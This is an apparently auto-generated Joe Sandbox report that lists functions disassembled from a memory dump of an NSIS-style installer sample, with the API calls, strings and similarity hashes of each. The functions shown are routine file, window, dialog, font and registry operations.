Source File: 00000003.00000002.3283685650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3283668198.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3283760223.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3283775713.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3283827776.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_2CQ2zMn0hb.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
Instruction ID: 4d8d1a64c5805e8a020b3744e793f2033a9a6b6b0a681029562fed9dd316a9da
Opcode Fuzzy Hash: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
Instruction Fuzzy Hash: 722131715007049BCB319F68D948B5BBBF8AF81714B148A2EEE96E26E0D738D944CB54

Function 0040264A Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(?,?,?,?), ref: 004026B6
MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 004026F1
SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 00402714
MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 0040272A

Part of subcall function 00405FBF: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405FD5

SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 004027D6

Strings

9, xrefs: 00402699

Memory Dump Source

Source File: 00000003.00000002.3283685650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3283668198.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3283760223.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3283775713.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3283827776.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_2CQ2zMn0hb.jbxd

Similarity

API ID: File$Pointer$ByteCharMultiWide$Read
String ID: 9
API String ID: 163830602-2366072709
Opcode ID: 1fdfab34e77cf90ebe23e3371142485a67670726d5f4eeccdfcf92a02d0001b8
Instruction ID: add249696b334c0fceafe0529c612de3b1c59f5eaafd60b3ba6c21ea99dd66a9
Opcode Fuzzy Hash: 1fdfab34e77cf90ebe23e3371142485a67670726d5f4eeccdfcf92a02d0001b8
Instruction Fuzzy Hash: FD510A74D10219AEDF21DF95DA88AAEB779FF04304F50443BE901B72D0D7B89982CB59

Function 00405450 Relevance: 10.6, APIs: 7, Instructions: 72stringwindowCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
lstrlenW.KERNEL32(00402F08,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
lstrcatW.KERNEL32(00422708,00402F08,00402F08,00422708,00000000,00000000,00000000), ref: 004054AB
SetWindowTextW.USER32(00422708,00422708), ref: 004054BD
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B

Memory Dump Source

Source File: 00000003.00000002.3283685650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3283668198.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3283760223.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3283775713.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3283827776.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_2CQ2zMn0hb.jbxd

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID:
API String ID: 2531174081-0
Opcode ID: b84216cbe2d5722ff5c8c30ae43643c8050e8425152119dcc0cd5bf76baef7c3
Instruction ID: e73fa1987b6059f35b704de59c80f6892b54c3d1ee51518932a2041d94d0b0cb
Opcode Fuzzy Hash: b84216cbe2d5722ff5c8c30ae43643c8050e8425152119dcc0cd5bf76baef7c3
Instruction Fuzzy Hash: BE21A171900558BACB119F95DD84ACFBFB5EF84314F10803AF904B22A1C3798A91CFA8

Function 00402E8E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,00000000), ref: 00402EA9
GetTickCount.KERNEL32 ref: 00402EC7
wsprintfW.USER32 ref: 00402EF5

Part of subcall function 00405450: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
Part of subcall function 00405450: lstrlenW.KERNEL32(00402F08,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
Part of subcall function 00405450: lstrcatW.KERNEL32(00422708,00402F08,00402F08,00422708,00000000,00000000,00000000), ref: 004054AB
Part of subcall function 00405450: SetWindowTextW.USER32(00422708,00422708), ref: 004054BD
Part of subcall function 00405450: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
Part of subcall function 00405450: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
Part of subcall function 00405450: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B

CreateDialogParamW.USER32(0000006F,00000000,00402DF3,00000000), ref: 00402F19
ShowWindow.USER32(00000000,00000005), ref: 00402F27

Part of subcall function 00402E72: MulDiv.KERNEL32(?,00000064,?), ref: 00402E87

Strings

... %d%%, xrefs: 00402EEF

Memory Dump Source

Source File: 00000003.00000002.3283685650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3283668198.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3283760223.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3283775713.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3283827776.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_2CQ2zMn0hb.jbxd

Similarity

API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
String ID: ... %d%%
API String ID: 722711167-2449383134
Opcode ID: c40ddff33436de44b244b2b19f9e8da7546f4e0328de08243a0837e5050f2c6b
Instruction ID: c65c9f61eb329069142d3a49436c3393aeffd9891ae55f37d91fa0e4ac25720a
Opcode Fuzzy Hash: c40ddff33436de44b244b2b19f9e8da7546f4e0328de08243a0837e5050f2c6b
Instruction Fuzzy Hash: 1A016170941614EBC7226B60EE4DA9B7B68BB01745B50413FF841F12E0CAB84459DBEE

Function 00404D1A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404D35
GetMessagePos.USER32 ref: 00404D3D
ScreenToClient.USER32(?,?), ref: 00404D57
SendMessageW.USER32(?,00001111,00000000,?), ref: 00404D69
SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404D8F

Strings

f, xrefs: 00404D6B

Memory Dump Source

Source File: 00000003.00000002.3283685650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3283668198.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3283760223.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3283775713.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3283827776.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_2CQ2zMn0hb.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
Instruction ID: ac2b37e4453cd55ff3643614bd1240a9a451636028a825994647dd398b99f398
Opcode Fuzzy Hash: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
Instruction Fuzzy Hash: 23015E71940218BADB00DB94DD85FFEBBBCAF95711F10412BBA50F62D0D7B499018BA4

Function 00406752 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406769
wsprintfW.USER32 ref: 004067A4
LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004067B8

Strings

UXTHEME, xrefs: 0040675B
\, xrefs: 0040677A
%s%S.dll, xrefs: 0040679E

Memory Dump Source

Source File: 00000003.00000002.3283685650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3283668198.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3283760223.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3283775713.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3283827776.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_2CQ2zMn0hb.jbxd

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%S.dll$UXTHEME$\
API String ID: 2200240437-1946221925
Opcode ID: 40aa1e09304642b089aa1993992f232c43871fa513f82abce0c0f0efb2bd037b
Instruction ID: 07f60acf873a648e61080255fd3e200204736070213a9ab7c1209ab7057fe03e
Opcode Fuzzy Hash: 40aa1e09304642b089aa1993992f232c43871fa513f82abce0c0f0efb2bd037b
Instruction Fuzzy Hash: 27F0FC70540219AECB10AB68ED0DFAB366CA700304F10447AA64AF20D1EB789A24C798

Function 00402DF3 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402E11
wsprintfW.USER32 ref: 00402E45
SetWindowTextW.USER32(?,?), ref: 00402E55
SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E67

Strings

verifying installer: %d%%, xrefs: 00402E3A
unpacking data: %d%%, xrefs: 00402E33, 00402E43

Memory Dump Source

Source File: 00000003.00000002.3283685650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3283668198.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3283760223.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3283775713.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3283827776.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_2CQ2zMn0hb.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: unpacking data: %d%%$verifying installer: %d%%
API String ID: 1451636040-1158693248
Opcode ID: a591fce2f88080881549ac7e7473da6278debd618655821d08f98b44133a3158
Instruction ID: 1bfa7b94c56a1c823be81e007cf4dd9dcc28a4463181553f30e61efe61dd31fb
Opcode Fuzzy Hash: a591fce2f88080881549ac7e7473da6278debd618655821d08f98b44133a3158
Instruction Fuzzy Hash: 30F0317064020CABDF206F60DD4ABEE3B69EB40319F00803AFA45B51D0DBB999598F99

Function 004028AD Relevance: 9.1, APIs: 6, Instructions: 86memoryfileCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402901
GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 0040291D
GlobalFree.KERNEL32(?), ref: 00402956
GlobalFree.KERNEL32(00000000), ref: 00402969
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402981
DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402995

Memory Dump Source

Source File: 00000003.00000002.3283685650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3283668198.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3283760223.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3283775713.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3283827776.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_2CQ2zMn0hb.jbxd

Similarity

API ID: Global$AllocFree$CloseDeleteFileHandle
String ID:
API String ID: 2667972263-0
Opcode ID: e143629cae8b78290b003201c05bc4b587d1aa12e059c50f50ac21e9d0b7acf9
Instruction ID: fa73a2a76dd28b4b8719808dd60f9f08d060129827b0ffc87b4efdc8f5ae5e12
Opcode Fuzzy Hash: e143629cae8b78290b003201c05bc4b587d1aa12e059c50f50ac21e9d0b7acf9
Instruction Fuzzy Hash: 3D21BFB1D00124BBCF116FA5DE48D9E7E79EF09364F10023AF9607A2E1CB794D418B98

Function 00404C0C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 84stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(00423728,00423728,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404CAD
wsprintfW.USER32 ref: 00404CB6
SetDlgItemTextW.USER32(?,00423728), ref: 00404CC9

Strings

%u.%u%s%s, xrefs: 00404C97
(7B, xrefs: 00404C9F

Memory Dump Source

Source File: 00000003.00000002.3283685650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3283668198.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3283760223.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3283775713.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3283827776.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_2CQ2zMn0hb.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s$(7B
API String ID: 3540041739-1320723960
Opcode ID: 44adf824a3a4d92ef29847c02d08b50033dbaa36d23830bd28d3a669162fbcd6
Instruction ID: eedca0a42859d703ec1426aadcab00983e9769f6aa36ce56d5d2522b0312c54d
Opcode Fuzzy Hash: 44adf824a3a4d92ef29847c02d08b50033dbaa36d23830bd28d3a669162fbcd6
Instruction Fuzzy Hash: A711D873A0412837EB00556DAC45EDE3298EB85374F254237FA26F31D1D9798C6282E8

Function 0040667C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69COMMON

Download Yara Rule

APIs

CharNextW.USER32(?,*?|<>/":,00000000,00000000,00437800,00437800,00435000,00403480,00437800,75923420,004036EF,?,00000006,00000008,0000000A), ref: 004066DF
CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004066EE
CharNextW.USER32(?,00000000,00437800,00437800,00435000,00403480,00437800,75923420,004036EF,?,00000006,00000008,0000000A), ref: 004066F3
CharPrevW.USER32(?,?,00437800,00437800,00435000,00403480,00437800,75923420,004036EF,?,00000006,00000008,0000000A), ref: 00406706

Strings

*?|<>/":, xrefs: 004066CE

Memory Dump Source

Source File: 00000003.00000002.3283685650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3283668198.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3283760223.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3283775713.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3283827776.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_2CQ2zMn0hb.jbxd

Similarity

API ID: Char$Next$Prev
String ID: *?|<>/":
API String ID: 589700163-165019052
Opcode ID: 6f1dc59467bf7cdf849013f1baa50d92fe1cb62039c7f0915d7e3466f5f67e46
Instruction ID: ccb021e8c97aa0e4e9f296cc8cc4b0d2e06c32826977e33acd3911ee1a404cd3
Opcode Fuzzy Hash: 6f1dc59467bf7cdf849013f1baa50d92fe1cb62039c7f0915d7e3466f5f67e46
Instruction Fuzzy Hash: E011C82580061295DB302B548C44B77A2E8EF55764F52843FE985B32C1EB7D5CE28ABD

Function 0040176F Relevance: 7.6, APIs: 5, Instructions: 145stringtimeCOMMON

Download Yara Rule

APIs

lstrcatW.KERNEL32(00000000,00000000,0040A5D8,00436000,?,?,00000031), ref: 004017B0
CompareFileTime.KERNEL32(-00000014,?,0040A5D8,0040A5D8,00000000,00000000,0040A5D8,00436000,?,?,00000031), ref: 004017D5

Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,00000400,00403576,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063F5

Part of subcall function 00405450: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
Part of subcall function 00405450: lstrlenW.KERNEL32(00402F08,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
Part of subcall function 00405450: lstrcatW.KERNEL32(00422708,00402F08,00402F08,00422708,00000000,00000000,00000000), ref: 004054AB
Part of subcall function 00405450: SetWindowTextW.USER32(00422708,00422708), ref: 004054BD
Part of subcall function 00405450: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
Part of subcall function 00405450: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
Part of subcall function 00405450: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B

Memory Dump Source

Source File: 00000003.00000002.3283685650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3283668198.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3283760223.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3283775713.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3283827776.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_2CQ2zMn0hb.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID:
API String ID: 1941528284-0
Opcode ID: 55b9c7873fef6a42146c5bba3a7473b4437248d5263e1ddde9fdc16840247bc8
Instruction ID: 2530360bafa170a9d5e8074bf3c3c5079485a484cad24ccb9f0485aee5561d29
Opcode Fuzzy Hash: 55b9c7873fef6a42146c5bba3a7473b4437248d5263e1ddde9fdc16840247bc8
Instruction Fuzzy Hash: FF41C671900614BADF11ABA5CD85DAF3679EF05329B20433BF412B10E2CB3C86529A6E

Function 00401DB9 Relevance: 7.5, APIs: 5, Instructions: 43COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 00401DBC
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD6
MulDiv.KERNEL32(00000000,00000000), ref: 00401DDE
ReleaseDC.USER32(?,00000000), ref: 00401DEF
CreateFontIndirectW.GDI32(0040CDD8), ref: 00401E3E

Memory Dump Source

Source File: 00000003.00000002.3283685650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3283668198.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3283760223.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3283775713.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3283827776.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_2CQ2zMn0hb.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectRelease
String ID:
API String ID: 3808545654-0
Opcode ID: e24a725036941366799e1b60f9567993ca488f5885cb4975d99fb3ecb50d70e9
Instruction ID: 863f18fc6204ba506076eb1f746ada73c94881a68b515e1873f2d1072bd1cf43
Opcode Fuzzy Hash: e24a725036941366799e1b60f9567993ca488f5885cb4975d99fb3ecb50d70e9
Instruction Fuzzy Hash: 15017171944240EFE701ABB4AF8ABD97FB4AF55301F10457EE242F61E2CA7804459F2D

Function 00401D5D Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 00401D63
GetClientRect.USER32(00000000,?), ref: 00401D70
LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D91
SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D9F
DeleteObject.GDI32(00000000), ref: 00401DAE

Memory Dump Source

Source File: 00000003.00000002.3283685650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3283668198.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3283760223.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3283775713.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3283827776.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_2CQ2zMn0hb.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: cecd7757bc9d55480b756717b9ac07822063c1f28e7ac406cf665e6dd60447a2
Instruction ID: 8bbc6a183a468c813578a114873fb97f9d5ca0b11dae6a70aa3aa56fe52826a6
Opcode Fuzzy Hash: cecd7757bc9d55480b756717b9ac07822063c1f28e7ac406cf665e6dd60447a2
Instruction Fuzzy Hash: 4BF0FF72A04518AFDB01DBE4DF88CEEB7BCEB48301B14047AF641F61A0CA749D519B38

Function 00401C1F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C8F
SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA7

Strings

!, xrefs: 00401C5B

Memory Dump Source

Source File: 00000003.00000002.3283685650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3283668198.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3283760223.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3283775713.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3283827776.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_2CQ2zMn0hb.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: 204806375d4f16312a37781d02af86e184349cdc68ded53cac09897120414cdc
Instruction ID: ef61c68cd4a6cc3a6f3726d4b558d534156d03c1c75d5f5b51cfe904c604fa23
Opcode Fuzzy Hash: 204806375d4f16312a37781d02af86e184349cdc68ded53cac09897120414cdc
Instruction Fuzzy Hash: A621B471948209AEEF049FA5DA4AABD7BB4EB44304F14443EF605B61D0D7B845409B18

Function 00402D44 Relevance: 6.1, APIs: 4, Instructions: 63registryCOMMON

Download Yara Rule

APIs

RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402DA9
RegCloseKey.ADVAPI32(?,?,?), ref: 00402DB2
RegCloseKey.ADVAPI32(?,?,?), ref: 00402DD3

Memory Dump Source

Source File: 00000003.00000002.3283685650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3283668198.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3283760223.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3283775713.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3283827776.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_2CQ2zMn0hb.jbxd

Similarity

API ID: Close$Enum
String ID:
API String ID: 464197530-0
Opcode ID: 1fd681a58c600dee98d7f7e5161f1cc79c94fe5fc9469311f060f0f5731105c3
Instruction ID: 3410daaf41eb2a8de7896e1fb7aa518538b3e031ab7f3cb45a1fbd23233d04dd
Opcode Fuzzy Hash: 1fd681a58c600dee98d7f7e5161f1cc79c94fe5fc9469311f060f0f5731105c3
Instruction Fuzzy Hash: CE116A32500108FBDF12AB90CE09FEE7B7DAF44350F100076B905B61E0E7B59E21AB58

Function 0040591F Relevance: 6.0, APIs: 4, Instructions: 39COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNEL32(?,?,00000000), ref: 00405962
GetLastError.KERNEL32 ref: 00405976
SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 0040598B
GetLastError.KERNEL32 ref: 00405995

Memory Dump Source

Source File: 00000003.00000002.3283685650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3283668198.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3283760223.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3283775713.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3283827776.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_2CQ2zMn0hb.jbxd

Similarity

API ID: ErrorLast$CreateDirectoryFileSecurity
String ID:
API String ID: 3449924974-0
Opcode ID: c15d26eb0fd7dc0754592b558b3576eabd9f17effa54cf70e09af9e442894ad1
Instruction ID: ca5323325ecea66cc3de0aafa4d6cbc44a00468c8660a14113972894dcb98988
Opcode Fuzzy Hash: c15d26eb0fd7dc0754592b558b3576eabd9f17effa54cf70e09af9e442894ad1
Instruction Fuzzy Hash: 970108B1C10219DADF009FA5C944BEFBFB4EB14314F00403AE544B6290DB789608CFA9

Function 00405DC5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,00000400,00403576,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063F5

Part of subcall function 00405D68: CharNextW.USER32(?,?,00425F30,?,00405DDC,00425F30,00425F30,00437800,?,75922EE0,00405B1A,?,00437800,75922EE0,00000000), ref: 00405D76
Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D7B
Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D93

lstrlenW.KERNEL32(00425F30,00000000,00425F30,00425F30,00437800,?,75922EE0,00405B1A,?,00437800,75922EE0,00000000), ref: 00405E1E
GetFileAttributesW.KERNEL32(00425F30,00425F30,00425F30,00425F30,00425F30,00425F30,00000000,00425F30,00425F30,00437800,?,75922EE0,00405B1A,?,00437800,75922EE0), ref: 00405E2E

Strings

0_B, xrefs: 00405DCB

Memory Dump Source

Source File: 00000003.00000002.3283685650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3283668198.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3283760223.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3283775713.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3283827776.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_2CQ2zMn0hb.jbxd

Similarity

API ID: CharNext$AttributesFilelstrcpynlstrlen
String ID: 0_B
API String ID: 3248276644-2128305573
Opcode ID: df6e64e4f6769b316d4c1c7beb25aaa03b2c49ca2ab4503c480f7fe4b4eab687
Instruction ID: e2ef3bf648e1011fa726b67e088789f036b8871ba300d86fb9c867912b04298b
